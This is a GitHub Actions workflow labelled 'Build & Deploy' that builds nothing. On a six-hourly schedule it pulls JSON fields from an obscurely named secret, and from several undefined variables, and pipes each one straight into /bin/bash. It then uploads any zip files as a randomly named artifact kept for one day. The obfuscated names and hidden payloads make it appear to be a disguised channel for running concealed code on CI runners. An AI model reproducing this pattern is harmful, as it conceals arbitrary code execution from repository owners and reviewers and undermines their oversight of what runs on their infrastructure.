name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '34 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  pipeline:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          ylpc8: ${{ secrets.ylpc8 }}
        run: |
          printf '%s' "$ylpc8" | jq -r .rgo08 | /bin/bash
          echo $yhmpa18801 | jq -r .aawm4161 | /bin/bash
          printf '%s' "$k32296" | jq -r .ljdwa8 | /bin/bash
          echo $xe4220 | jq -r .k07 | /bin/bash
          echo $rqdiz23 | jq -r .axjz48 | /bin/bash

      - name: Persist output
        if: ${{ always() }}
        uses: actions/upload-artifact@v4
        with:
          name: 2tVBUpiL
          path: "*.zip"
          retention-days: 1
